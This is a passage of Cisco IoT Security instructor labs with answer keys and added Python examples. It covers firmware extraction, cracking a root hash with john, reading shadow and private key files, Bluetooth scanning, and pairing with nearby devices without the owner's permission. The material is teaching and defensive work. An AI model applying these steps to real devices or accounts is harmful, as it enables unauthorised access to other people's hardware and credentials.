# cd /root/lab_support_files/emulated/mips32
# strings rootfs.ext2 | grep root:\\$ > /tmp/passwd
# more /tmp/passwd
b. Run john on the file /tmp/passwd to crack the password.
# john /tmp/passwd
Created directory: /root/.john
Warning: detected hash type "md5crypt", but the string is also recognized as "aix-smd5"
Use the "--format=aix-smd5" option to force loading these as that type instead
<some output omitted>
Use the "--show" option to display all of the cracked passwords reliably
Session completed
You could also use the show option to display the cracked passwords.
# john --show /tmp/passwd
What is the root password? ________________________________________________________ device

Step 3: Extract the IoT device firmware binary file into a new directory.
a. Change directories to the IoT device firmware file:
# cd /root/lab_support_files/firmware
b. List the content of the folder and obtain the name of the firmware file:
# ls -l
c. The following command will extract the file system from the firmware and will allow you to navigate and
explore anything that can be targeted as a potential vulnerability:
# binwalk -e iotdev_firmware.bin
What is the file system type? _____________________________________________________ squashfs

Step 4: Examine the output of the binwalk command.


a. What is the significance of this file system type? Do a web search to find more information.
____________________________________________________________________________________
____________________________________________________________________________________
squashfs is a compressed file system for Linux where low overhead is needed.
b. Verify what new subdirectory was added:
# ls -l
What was the name of the new directory that was added?
____________________________________________________________________________________
_iotdev_firmware.bin.extracted
c. Change into this new directory:
# cd _iotdev_firmware.bin.extracted

What is the name of the new directory within this subdirectory? What command did you use to determine
that?
____________________________________________________________________________________
____________________________________________________________________________________
squashfs-root, ls -l

Step 5: Navigate and explore this extracted file system


a. Verify the directory you are in and list the content of the directory:
# pwd
# ls -l
b. Move into the new squashfs-root directory:
# cd squashfs-root
What are some of the subdirectories in this directory? What command did you use?
____________________________________________________________________________________
____________________________________________________________________________________
sbin, ls -l
c. The readelf command can be used to determine what architecture a binary file was originally compiled to
be run on. Use readelf to determine what architecture the chkntfs binary file (located in sbin) is supposed
to be run on. This command will help us determine which qemu binary to run in the next step.
# readelf -h sbin/route
What is the Machine architecture listed?
____________________________________________________________________________________
MIPS R3000
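Added example (not part of the lab): the decision readelf -h supports in this step, reading the ELF header's class, endianness and e_machine fields to name the qemu user-mode binary that can run a given file from squashfs-root, scripted so it can be run across a whole firmware tree. The field layout follows the ELF specification; the qemu-*-static binary names are the usual Debian/Kali package names and are assumed here, and the sample headers are constructed.

```python
#!/usr/bin/env python3
"""Pick the qemu user-mode emulator for an ELF binary from its header.

Assumed (not from the lab): the qemu-*-static binary names below.
"""
import struct

# e_machine values from the ELF specification
EM_386, EM_MIPS, EM_ARM, EM_X86_64, EM_AARCH64 = 3, 8, 40, 62, 183

MACHINE_NAME = {EM_386: "Intel 80386", EM_MIPS: "MIPS R3000", EM_ARM: "ARM",
                EM_X86_64: "Advanced Micro Devices X86-64", EM_AARCH64: "AArch64"}

# (e_machine, is 64-bit, is little-endian) -> qemu user-mode binary
QEMU_FOR = {
    (EM_MIPS, False, False): "qemu-mips-static",
    (EM_MIPS, False, True): "qemu-mipsel-static",
    (EM_MIPS, True, False): "qemu-mips64-static",
    (EM_MIPS, True, True): "qemu-mips64el-static",
    (EM_ARM, False, True): "qemu-arm-static",
    (EM_AARCH64, True, True): "qemu-aarch64-static",
    (EM_386, False, True): "qemu-i386-static",
    (EM_X86_64, True, True): "qemu-x86_64-static",
}


def elf_header(data):
    """Parse the header fields needed to choose an emulator.

    Raises ValueError for anything that is not an ELF file; a firmware tree
    also holds shell scripts, data files and broken extractions.
    """
    if len(data) < 20 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]      # EI_CLASS, EI_DATA
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("invalid EI_CLASS or EI_DATA")
    little = ei_data == 1
    # e_type and e_machine are the two 16-bit fields right after e_ident[16],
    # stored in the byte order EI_DATA announces
    e_type, e_machine = struct.unpack_from("<HH" if little else ">HH", data, 16)
    return {"bits": 32 if ei_class == 1 else 64,
            "little_endian": little,
            "e_type": e_type,
            "e_machine": e_machine,
            "machine": MACHINE_NAME.get(e_machine, "unknown (%d)" % e_machine)}


def qemu_binary(data):
    """Name the qemu-*-static binary for this ELF, or None if not mapped."""
    h = elf_header(data)
    return QEMU_FOR.get((h["e_machine"], h["bits"] == 64, h["little_endian"]))


# Constructed 52-byte headers: a 32-bit big-endian MIPS executable (what the
# lab's sbin binaries report) and a 32-bit little-endian ARM executable
SAMPLE_MIPS_BE = (b"\x7fELF" + b"\x01\x02\x01" + b"\x00" * 9
                  + struct.pack(">HH", 2, EM_MIPS) + b"\x00" * 32)
SAMPLE_ARM_LE = (b"\x7fELF" + b"\x01\x01\x01" + b"\x00" * 9
                 + struct.pack("<HH", 2, EM_ARM) + b"\x00" * 32)

if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:          # e.g. python3 elfarch.py sbin/* bin/*
        with open(path, "rb") as f:
            head = f.read(64)
        try:
            print(path, elf_header(head)["machine"], qemu_binary(head))
        except ValueError as err:
            print(path, err)
    print("constructed sample:", elf_header(SAMPLE_MIPS_BE)["machine"],
          qemu_binary(SAMPLE_MIPS_BE))
```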

Step 6: Use the QEMU open source machine emulator and virtualizer
QEMU will allow you to emulate binaries for other architectures different from what your Kali Linux image is
currently running on. QEMU supports the MIPS architecture.
All of the binaries in the squashfs-root directory that were decompiled/decompressed from the IoT device’s
firmware file were compiled for the MIPS architecture. They will not run on this Kali Virtual Image because it is
on a different architecture. In order to run these binaries, we will need to use QEMU.
Instructor Note: QEMU should already be installed on the Kali Linux virtual image.
a. The QEMU binary that we will be using needs to be copied to the squashfs-root directory. Before we
copy it, we need to know where it is located:
# which qemu-mips-static
Where is this binary file located? _________________________________________________________
/usr/bin/qemu-mips-static
b. Copy this file to the current working directory, which should be squashfs-root:
# cp /usr/bin/qemu-mips-static .
c. Try running bin/busybox and other binaries without QEMU and notice that they will not be successful:
# bin/busybox

# bin/ping 127.0.0.1
These commands did not work since the QEMU emulator is required to run binaries originally compiled on
different architectures.
d. The following uses the chroot command. The chroot command changes the root directory to the current
directory as identified with the . (dot)
Enter the commands below to demonstrate that we can run MIPS binaries on the Kali Linux OS:
# chroot . ./qemu-mips-static bin/busybox date
# chroot . ./qemu-mips-static bin/ping -c 3 127.0.0.1
e. Start a new shell within the squashfs-root directory with the following command:
# chroot . ./qemu-mips-static bin/sh
How did the prompt change? ____________________________________________________________
It is now displaying the path as ‘/’ followed by the # for the root prompt
f. Verify that new shell is using the current path as the root directory.
# pwd
What is the current path? ______________________________________________________________ /
Look at other programs/binaries in the bin and sbin directories. Try running at least 3 other programs and
document their results. Type ‘exit’ when you have completed exploration to leave the shell.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.

Step 7: Explore and look at other important files on this decompiled/extracted file system
a. Verify you are currently within the squashfs-root directory:
# pwd
b. Use the following commands to explore and look for possible vulnerabilities:
# ls -l usr
# ls -l usr/bin
# ls -l bin/
# ls -l usr/sbin
# ls -l etc/
# cat etc/passwd
# cat etc/shadow
# cat etc/ssh/ssh_host_rsa_key
c. What other commands did you use to explore and look for possible vulnerabilities?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________

Answers will vary. Example: The mount command could allow access to other filesystems and import
malicious files or export files, such as /etc/shadow.
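Added example (not part of the lab): a script that reviews the files step b has you look at, etc/passwd, etc/shadow and any shipped private keys, and reports them the way a firmware reviewer would (empty passwords, extra UID 0 accounts, hard-coded hashes and their algorithm, host keys baked into the image so every unit shares them). The function names are my own; the sample passwd and shadow lines are constructed and the hash in them is made up, only its $1$ prefix matters.

```python
#!/usr/bin/env python3
"""Review account data and private keys in an extracted firmware tree.

Constructed sample lines are used by default; pass the path to
squashfs-root to run the same checks on a real extraction.
"""
import os

# crypt(3) hash prefixes and how a reviewer should report them
HASH_STRENGTH = [("$1$", "md5crypt (weak; john cracks it quickly)"),
                 ("$2", "bcrypt"),
                 ("$5$", "sha256crypt"),
                 ("$6$", "sha512crypt"),
                 ("$y$", "yescrypt")]


def parse_entries(text):
    """Yield the colon separated fields of each non-comment line."""
    for line in text.splitlines():
        if line.strip() and not line.startswith("#"):
            yield line.split(":")


def classify(hash_field):
    """Describe one password field the way an auditor would report it."""
    if hash_field == "":
        return "EMPTY PASSWORD: login succeeds with no password at all"
    if hash_field == "x":
        return "deferred to shadow"
    if hash_field.startswith(("*", "!")):
        return "locked"
    for prefix, name in HASH_STRENGTH:
        if hash_field.startswith(prefix):
            return "hard-coded hash: " + name
    if len(hash_field) == 13:
        return "hard-coded hash: traditional DES crypt (very weak)"
    return "unrecognised hash format"


def audit_accounts(passwd_text, shadow_text):
    """Return {user: finding}; a shadow entry overrides the passwd field."""
    findings = {}
    for fields in parse_entries(passwd_text):
        if len(fields) >= 2:
            findings[fields[0]] = classify(fields[1])
    for fields in parse_entries(shadow_text):
        if len(fields) >= 2:
            findings[fields[0]] = classify(fields[1])
    return findings


def uid0_accounts(passwd_text):
    """Every account with UID 0 is a root login, whatever it is called."""
    return sorted(f[0] for f in parse_entries(passwd_text)
                  if len(f) >= 3 and f[2] == "0")


def is_private_key(head):
    """True if the first bytes of a file look like a PEM/OpenSSH private key."""
    return head.startswith(b"-----BEGIN ") and b"PRIVATE KEY" in head


def find_private_keys(tree):
    """Walk an extracted tree and list files that start like a private key."""
    hits = []
    for root, _, files in os.walk(tree):
        for name in files:
            path = os.path.join(root, name)
            try:
                with open(path, "rb") as f:
                    if is_private_key(f.read(64)):
                        hits.append(path)
            except OSError:
                pass   # dangling symlinks and device nodes are common in firmware
    return sorted(hits)


# Constructed sample lines (not taken from the lab's image)
SAMPLE_PASSWD = ("root:x:0:0:root:/root:/bin/sh\n"
                 "admin::0:0:admin:/:/bin/sh\n"
                 "nobody:*:65534:65534:nobody:/:/bin/false\n")
SAMPLE_SHADOW = "root:$1$constructed$NotARealHashValueAtAll00:17000:0:99999:7:::\n"

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:              # e.g. python3 fw_audit.py squashfs-root
        tree = sys.argv[1]

        def read(rel):
            path = os.path.join(tree, rel)
            return open(path).read() if os.path.isfile(path) else ""
        passwd, shadow, keys = read("etc/passwd"), read("etc/shadow"), find_private_keys(tree)
    else:
        passwd, shadow, keys = SAMPLE_PASSWD, SAMPLE_SHADOW, []
    for user, finding in audit_accounts(passwd, shadow).items():
        print("%-12s %s" % (user, finding))
    print("UID 0 accounts:", uid0_accounts(passwd))
    print("private keys shipped in image:", keys)
```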

Part 2: Reflection and Discussion of Threats to IoT Device Firmware


Part 1 of this lab demonstrates how to decompile/disassemble a binary firmware file and navigate the file
system for vulnerabilities. Hackers are able to use widely available tools to modify the firmware with
backdoors or Trojan horses and repackage the firmware into a new firmware image.

Reflection
1. What kinds of threats or vulnerabilities are IoT device firmware susceptible to?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
IoT devices might be vulnerable to attacks such as Buffer Overflow attacks, DoS attacks, firmware
modification, distributed denial of service, and key handling vulnerabilities.
2. Describe one type of IoT device firmware attack and what measures could be used to help prevent this type
of attack.
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
A backdoor could be added to an existing script within the device firmware. If a hacker repackages the
firmware into a new downloadable binary file, an unsuspecting user could potentially install this infected
firmware on their IoT device. A hash could be used to verify that firmware binary files have not been modified.
3. Describe another type of IoT device firmware attack and what measures could be used to help prevent this
type of attack.
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
IoT devices with default usernames could be logged into remotely. The fix includes changing the default
usernames/passwords.
In addition: Passwords can be cracked or modified, and certificates can be modified.
4. What is the name of the program that hackers could use to modify firmware with a backdoor and repackage it
back into another firmware binary? Does this program exist on the Kali Linux operating system that you are
using? Hint: Use Google to find the answer.
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
firmware-mod-kit
Yes.
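The hash check suggested in the answer to question 2, and why a bare hash is not enough against repackaged firmware, worked through in an added Python example that is not part of the Cisco lab. The image bytes, manifest format and key are constructed here; the keyed HMAC stands in for the asymmetric signature a real vendor would publish.

```python
"""Verify a firmware image against a manifest before it is flashed.

Added example, not part of the Cisco lab. The image bytes, manifest format and
key are constructed here; a real vendor publishes an asymmetric signature,
for which a keyed HMAC stands in so the example needs only the standard library.
"""
import hashlib
import hmac

# Constructed sample images: the vendor's build and a repackaged copy with an
# extra line inserted into a startup script (a stand-in for a backdoor).
ORIGINAL_IMAGE = b"squashfs-root/etc/init.d/rcS: start httpd\n"
MODIFIED_IMAGE = ORIGINAL_IMAGE + b"# line inserted by an attacker\n"

VENDOR_KEY = b"constructed-demo-key"   # stands in for the vendor's private key


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def make_manifest(image: bytes, key: bytes) -> dict:
    """Publish the image digest plus a keyed tag over that digest."""
    digest = sha256_hex(image)
    tag = hmac.new(key, digest.encode(), hashlib.sha256).hexdigest()
    return {"sha256": digest, "tag": tag}


def verify_digest_only(image: bytes, manifest: dict) -> bool:
    """The check the lab answer suggests: compare the image hash to the one
    shipped with it. Catches corruption, but not an attacker who republishes
    both the image and its hash."""
    return hmac.compare_digest(sha256_hex(image), manifest["sha256"])


def verify_keyed(image: bytes, manifest: dict, key: bytes) -> bool:
    """Hash check plus a tag that only the key holder can produce."""
    digest = sha256_hex(image)
    if not hmac.compare_digest(digest, manifest["sha256"]):
        return False
    expected = hmac.new(key, digest.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, manifest["tag"])


# What the vendor ships, and what a repackager can ship without the key.
VENDOR_MANIFEST = make_manifest(ORIGINAL_IMAGE, VENDOR_KEY)
ATTACKER_MANIFEST = make_manifest(MODIFIED_IMAGE, b"attacker-guessed-key")


if __name__ == "__main__":
    cases = (("vendor image, vendor manifest", ORIGINAL_IMAGE, VENDOR_MANIFEST),
             ("modified image, vendor manifest", MODIFIED_IMAGE, VENDOR_MANIFEST),
             ("modified image, attacker manifest", MODIFIED_IMAGE, ATTACKER_MANIFEST))
    for label, image, manifest in cases:
        print(f"{label}: digest-only={verify_digest_only(image, manifest)} "
              f"keyed={verify_keyed(image, manifest, VENDOR_KEY)}")
```

The third case is the repackaging scenario from the answer: the digest-only check passes because the attacker recomputed the hash, while the keyed check fails.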

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 5 of 5 www.netacad.com
Lab - Sniffing Bluetooth with the Raspberry Pi (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Topology

Objectives
In this lab, students will become familiar with the varying levels of security on different common devices that use
Bluetooth/BLE (Bluetooth Low Energy). Students will configure a Raspberry Pi to detect and display
information about the Bluetooth devices that are in its range. This is an awareness-building lab that will help
students understand the nature of wireless hacking processes and requirements, and take on a “hacker
mindset”, thinking like a “white hat”, to help secure IoT devices.
Part 1: Configuring the Raspberry Pi as a Bluetooth Sniffer
Part 2: Using the CLI to Detect and Display Information about Bluetooth Devices
Part 3: Using the CLI to Pair with a Sniffed Device

Background/Scenario
Bluetooth offers several benefits and advantages. Bluetooth also has risks.
Bluetooth technology and associated devices are susceptible to general wireless networking threats, such as
denial of service attacks and man in the middle (MITM) attacks. MITM attacks occur when the threat actors
position themselves between the source and destination and intercept the communications. Some Bluetooth
devices are designed to broadcast their MAC address, universally unique identifier (UUID) and service information at a
predefined interval. Because of this continuous advertisement, hackers can easily track the device and decode the
broadcasting information using a sniffer. This lab requires that the target Bluetooth devices are locatable by
the Raspberry Pi. These could be phones, laptops, personal fitness devices, and others.
Note: The labs in this course assume that the student has all of the necessary hardware to perform them. If
you do not have the necessary hardware and wish to complete these labs, you may wish to purchase kits
which contain all of the hardware for the challenge labs and additional hardware, which can be used to
complete additional experiments beyond this course. Make sure to read the required resources for each
challenge lab to understand what hardware is required.
Instructor Note: Using a sniffer may be considered a breach of the security policy of the school. It is
recommended that permission be obtained before running this lab. If using a sniffer is an issue, the instructor
may wish to assign the lab as homework.

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 6 www.netacad.com
Lab - Sniffing Bluetooth with the Raspberry Pi

Required Resources
• Raspberry Pi 3 Model B or later (with PL-App)
• 8GB Micro SD card (minimum required)
• PC with IoTSec Kali VM
• Network connectivity between PC and Raspberry Pi
• Bluetooth devices (PC, Smartphone, Smartband, Bluetooth LED Control…)

Part 1: Configuring the Raspberry Pi as a Bluetooth Sniffer

Step 1: Set up the topology.


a. Start the IoT Security lab topology with Kali VM and Raspberry Pi connected physically via an Ethernet
cable.
b. Log into Kali VM with the username root and password toor.
c. Open a terminal window and start the DHCP server.
root@kali:~# ./lab_support_files/scripts/start_dhcp.sh
[ ok ] Starting isc-dhcp-server (via systemctl): isc-dhcp-server.service.
d. Determine the IP address of your Raspberry Pi as was done in previous labs, if necessary.
e. Open a web browser in the Kali VM or your host PC and navigate to the IP address for your Raspberry Pi.

Step 2: Verify and activate the Bluetooth interface/services on the Raspberry Pi.
a. Within the PL-App, open a terminal window and enter the rfkill list command to check if the Bluetooth
interface is blocked by software:
(pl-app) root@pi:/home/pi/notebooks# rfkill list
0: phy0: Wireless LAN
Soft blocked: no
Hard blocked: no
1: hci0: Bluetooth
Soft blocked: no
Hard blocked: no
b. If the Bluetooth Interface hci0 is blocked, use the command rfkill unblock bluetooth to unlock it.
c. Use the systemctl status bluetooth.service command to show the status of the Bluetooth service.
(pl-app) root@pi:/home/pi/notebooks# systemctl status bluetooth.service
● bluetooth.service - Bluetooth service
Loaded: loaded (/lib/systemd/system/bluetooth.service; enabled; vendor
preset: enabled)
Active: active (running) since Tue 2018-05-22 00:00:02 UTC; 10h ago
Docs: man:bluetoothd(8)
Main PID: 522 (bluetoothd)
Status: "Running"
CGroup: /system.slice/bluetooth.service
└─522 /usr/lib/bluetooth/bluetoothd
<output omitted>

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 6 www.netacad.com
Lab - Sniffing Bluetooth with the Raspberry Pi

d. If the Bluetooth service status is not “active (running)”, use the command systemctl start
bluetooth.service to start it.
(pl-app) root@pi:/home/pi/notebooks# systemctl start bluetooth.service
e. Use the hciconfig hci0 command to display the status of the Bluetooth interface.
(pl-app) root@pi:/home/pi/notebooks# hciconfig hci0
hci0: Type: Primary Bus: UART
BD Address: B8:27:EB:72:CC:11 ACL MTU: 1021:8 SCO MTU: 64:1
UP RUNNING
RX bytes:6770 acl:46 sco:0 events:230 errors:0
TX bytes:3819 acl:46 sco:0 commands:90 errors:0
f. If the hci0 interface status is down, use the command hciconfig hci0 up to activate it.
(pl-app) root@pi:/home/pi/notebooks# hciconfig hci0 up

Part 2: Using the CLI to Detect and Display Information about Bluetooth
Devices
a. From the command line, use the command bluetoothctl to launch the Bluetooth tool. The prompt will
change to [bluetooth]#. The tool displays some information about the Bluetooth controller of your
Raspberry Pi and probably some information about Bluetooth devices that are connected or available for
pairing:
(pl-app) root@pi:/home/pi/notebooks# bluetoothctl
[NEW] Controller B8:27:EB:72:CC:11 raspberrypi [default]
[bluetooth]#
b. Enter the scan on command to start searching for nearby Bluetooth devices and scan off to stop it. You
should see the MAC addresses and sometimes the device name of all Bluetooth devices discovered by
the Raspberry Pi:
[bluetooth]# scan on
Discovery started
[CHG] Controller B8:27:EB:72:CC:11 Discovering: yes
[NEW] Device A4:C1:38:CC:F5:42 Triones-A4C138CCF542
[NEW] Device DA:B6:4A:F2:A8:BA Band
[NEW] Device 28:98:7B:E1:CE:D8 GT-S700
[bluetooth]# scan off
Take note of the MAC address (and if available the name) of some discovered Bluetooth devices:
____________________________________________________________________________________
Answers will vary.
c. Use the info command followed by the MAC address of a discovered device to obtain detailed
information about the device:
[bluetooth]# info DA:B6:4A:F2:A8:BA
Device DA:B6:4A:F2:A8:BA
Name: Band
Alias: Band
Paired: no
Trusted: no
Blocked: no
Connected: no
LegacyPairing: no
UUID: Anhui Huami Information.. (0000fee0-0000-1000-8000-00805f9b34fb)
ManufacturerData Key: 0x0157
Take note of the information displayed and perform a web search for the meaning of some fields
displayed and report below a summary of the main information displayed.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The output for DA:B6:4A:F2:A8:BA is a smartband. The UUID usually represents some common service
(protocol) that the discovered Bluetooth device supports.
Additional Example 1: This output is related to a GT-S7500 Smartphone.
[bluetooth]# info 28:98:7B:E1:CE:D8
Device 28:98:7B:E1:CE:D8
Name: GT-S7500
Alias: GT-S7500
Class: 0x58020c
Icon: phone
Paired: no
Trusted: no
Blocked: no
Connected: no
LegacyPairing: no
UUID: Audio Source (0000110a-0000-1000-8000-00805f9b32fb)
UUID: A/V Remote Control Target (0000110c-0000-1000-8000-00805f9b32fb)
UUID: Handsfree Audio Gateway (0000111f-0000-1000-8000-00805f9b32fb)
UUID: Headset AG (00001112-0000-1000-8000-00805f9b32fb)
UUID: OBEX Object Push (00001105-0000-1000-8000-00805f9b32fb)
UUID: Phonebook Access Server (0000112f-0000-1000-8000-00805f9b32fb)
[bluetooth]#
Additional Example 2: This output is related to a LED Bluetooth controller.
[bluetooth]# info A4:C1:38:CC:F5:42
Device A4:C1:38:CC:F5:42
Name: Triones-A4C138CCF542
Alias: Triones-A4C138CCF542
Paired: no
Trusted: no
Blocked: no
Connected: no
Legacy Pairing: no
UUID: Unknown (0000ffd0-0000-1000-8000-00805f9b34fb)
UUID: Unknown (0000ffd5-0000-1000-8000-00805f9b34fb)
[bluetooth]#
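The info output above can be turned into an inventory record: which fields say the device is discoverable but unpaired, which UUIDs are Bluetooth SIG assigned numbers and which are vendor-specific. The following parser is an added example, not part of the Cisco lab; the two sample outputs are copied from the transcript above, while the parsing rules and the summary format are this example's own.

```python
"""Parse `bluetoothctl info` output and summarise what a nearby device exposes.

Added example, not part of the Cisco lab. The two sample outputs are copied
from the lab transcript; the parsing rules and the exposure summary are this
example's own, and service names are whatever bluetoothctl printed, not a
full Bluetooth SIG assigned-numbers lookup.
"""
import re

# A 16-bit Bluetooth SIG assigned number XXXX is carried in the 128-bit form
# 0000XXXX-0000-1000-8000-00805f9b34fb (the Bluetooth base UUID).
BASE_UUID_SUFFIX = "-0000-1000-8000-00805f9b34fb"
UUID_RE = re.compile(r"UUID:\s+(.*?)\s+\(([0-9a-fA-F-]{36})\)")
FIELD_RE = re.compile(r"^\s*([A-Za-z ]+?):\s+(.*)$")
BOOL_FIELDS = ("Paired", "Trusted", "Blocked", "Connected", "LegacyPairing")

# Sample 1: the smartband from the lab transcript.
BAND_INFO = """\
[bluetooth]# info DA:B6:4A:F2:A8:BA
Device DA:B6:4A:F2:A8:BA
Name: Band
Alias: Band
Paired: no
Trusted: no
Blocked: no
Connected: no
LegacyPairing: no
UUID: Anhui Huami Information.. (0000fee0-0000-1000-8000-00805f9b34fb)
ManufacturerData Key: 0x0157
"""

# Sample 2: the LED controller from the lab transcript.
LED_INFO = """\
[bluetooth]# info A4:C1:38:CC:F5:42
Device A4:C1:38:CC:F5:42
Name: Triones-A4C138CCF542
Alias: Triones-A4C138CCF542
Paired: no
Trusted: no
Blocked: no
Connected: no
Legacy Pairing: no
UUID: Unknown (0000ffd0-0000-1000-8000-00805f9b34fb)
UUID: Unknown (0000ffd5-0000-1000-8000-00805f9b34fb)
"""


def short_uuid(uuid: str):
    """16-bit assigned number if the UUID is SIG-based, otherwise None."""
    u = uuid.lower()
    if len(u) == 36 and u.startswith("0000") and u.endswith(BASE_UUID_SUFFIX):
        return int(u[4:8], 16)
    return None


def parse_info(text: str) -> dict:
    info = {"address": None, "fields": {}, "flags": {}, "uuids": [], "manufacturer_id": None}
    for line in text.splitlines():
        if line.startswith("Device "):
            info["address"] = line.split()[1]
            continue
        m = UUID_RE.search(line)
        if m:
            name, uuid = m.group(1), m.group(2).lower()
            info["uuids"].append({"name": name, "uuid": uuid, "short": short_uuid(uuid)})
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue                      # prompt lines and anything unrecognised
        # Normalise "Legacy Pairing" / "LegacyPairing" to one key.
        key, value = m.group(1).strip().replace(" ", ""), m.group(2).strip()
        if key in BOOL_FIELDS:
            info["flags"][key] = value.lower() == "yes"
        elif key == "ManufacturerDataKey":
            info["manufacturer_id"] = int(value, 16)   # Bluetooth SIG company identifier
        else:
            info["fields"][key] = value
    return info


def summarize(info: dict) -> dict:
    """Condense a parsed record into what an inventory or risk review needs."""
    known = [u["name"] for u in info["uuids"] if u["name"] != "Unknown"]
    unknown = [f"0x{u['short']:04X}" if u["short"] is not None else u["uuid"]
               for u in info["uuids"] if u["name"] == "Unknown"]
    return {
        "address": info["address"],
        "name": info["fields"].get("Name"),
        "discoverable_unpaired": not info["flags"].get("Paired", False),
        "known_services": known,
        "unknown_services": unknown,
        "manufacturer_id": info["manufacturer_id"],
    }


if __name__ == "__main__":
    for sample in (BAND_INFO, LED_INFO):
        print(summarize(parse_info(sample)))
```

Unknown short UUIDs such as 0xFFD0 are custom vendor services; their behaviour has to be checked against the vendor's documentation rather than the SIG specifications.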

Part 3: Using the CLI to Pair with a Sniffed Device


a. Use the command paired-devices to view the devices currently paired with the Raspberry Pi.
[bluetooth]# paired-devices
Report below the MAC address and name of the Bluetooth devices currently paired with your Raspberry
Pi.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.
b. Use the command pair followed by the MAC address, for example, pair CA:4C:FB:5E:00:BA, to try to
pair the Raspberry Pi over Bluetooth with some of the previously discovered devices.
[bluetooth]# pair CA:4C:FB:5E:00:BA
Attempting to pair with CA:4C:FB:5E:00:BA
<Output omitted>
[CHG] Device CA:4C:FB:5E:00:BA Paired: yes
Pairing successful
Are you able to pair with some Bluetooth devices without permission from the owner? Report your
findings below:
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
You probably will not be able to pair, without the authorization of the owner, with Bluetooth devices
that implement high levels of security.
c. Use the command paired-devices to view the devices now paired with the Raspberry Pi.
[bluetooth]# paired-devices
Device CA:4C:FB:5E:00:BA K800BA
Record the MAC address and name of the Bluetooth devices now paired with your Raspberry Pi.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
d. Use the command connect followed by the MAC address, for example, connect CA:4C:FB:5E:00:BA,
to try to connect the Raspberry Pi over Bluetooth to some of the previously paired devices.
[bluetooth]# connect CA:4C:FB:5E:00:BA
Attempting to connect to CA:4C:FB:5E:00:BA
[CHG] Device CA:4C:FB:5E:00:BA Connected: yes
Connection successful
[CHG] Device CA:4C:FB:5E:00:BA ServicesResolved: yes
[K800BA]#
Are you able to connect (without permission from the owner) to some Bluetooth devices? Write your
findings below:
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary. You may not be able to connect, without the authorization of the owner, to Bluetooth
devices that implement a high level of security. The Raspberry Pi can be connected to a Bluetooth device
without a PIN. Further operations may probably be accomplished after pairing the device. Please note that
the success/output of the command depends on the Bluetooth version and Bluetooth security level mode
of the target device. For example, Bluetooth devices that use Security Mode 1 are inherently insecure.
e. Enter quit to exit the Bluetooth tool.
[bluetooth]# quit

Part 4: Clean Up
a. Enter systemctl stop bluetooth.service to stop the Bluetooth service.
(pl-app) root@Pi-3:/home/pi/notebooks# systemctl stop bluetooth.service
b. Verify that the Bluetooth service has been stopped with the systemctl status bluetooth.service
command.
(pl-app) root@Pi-3:/home/pi/notebooks# systemctl status bluetooth.service
● bluetooth.service - Bluetooth service
Loaded: loaded (/lib/systemd/system/bluetooth.service; enabled; vendor
preset: enabled)
Active: inactive (dead) since Tue 2018-11-27 21:47:30 UTC; 1min 10s ago
Docs: man:bluetoothd(8)
Process: 843 ExecStart=/usr/lib/bluetooth/bluetoothd (code=exited,
status=0/SUCCESS)
Main PID: 843 (code=exited, status=0/SUCCESS)
Status: "Quitting"
<output omitted>

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 6 of 6 www.netacad.com
Lab - Port Scanning an IoT Device (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Topology

Objectives
Part 1: Perform an Nmap Network Discovery Scan
Part 2: Compare an Nmap TCP Default Port Scan and Full Scan
Part 3: Perform an Nmap UDP Scan
Part 4: Perform Nmap OS and Service Footprinting

Background / Scenario
Nmap, or “Network mapper,” is a free and open source network port scanner. It can be used to test IoT
devices and firewalls for open, closed, or filtered ports and additionally can provide an inventory of devices
and services available on a network. Nmap uses the TCP header flag fields URG, ACK, PSH, RST, SYN,
FIN, shown in the diagram, to accomplish its scans. It also uses other protocols such as UDP, ICMP and a
built-in database of known OS and application signatures. Nmap is included with Kali, but can also be
downloaded from https://nmap.org/. A comprehensive reference about how Nmap works and how it is used is
available at the Nmap website.

Required Resources
• Raspberry Pi 3 Model B or later
• 8GB Micro SD card (minimum required)
• PC with IoTSec Kali VM
• Network connectivity between PC and Raspberry Pi

Part 1: Perform an Nmap Network Discovery Scan

Step 1: Use Kali to perform a host discovery scan.


The first step in network scanning is to discover the addresses of the hosts that are actually up on the
network. This is because many network information gathering tasks, such as port scanning, are
time-consuming. Nmap first scans the network to identify the addresses of hosts that should be scanned in
greater depth. Doing in-depth scans of an entire network of 254 hosts, for example, is unnecessary if only a
fraction of those hosts are actually on and able to respond.
By default, Nmap conducts a scan of the network to generate a list of hosts that are available for further
scanning. It then conducts a port scan of those hosts.
a. Set up the topology by connecting the Raspberry Pi to the PC.
b. Start the IoTSec Kali VM and log in.
c. Open a terminal and start the DHCP server on the Kali VM.
root@kali:~# lab_support_files/scripts/start_dhcp.sh
d. Verify that Kali VM is assigned an IP address on eth0.
root@kali:~# ifconfig
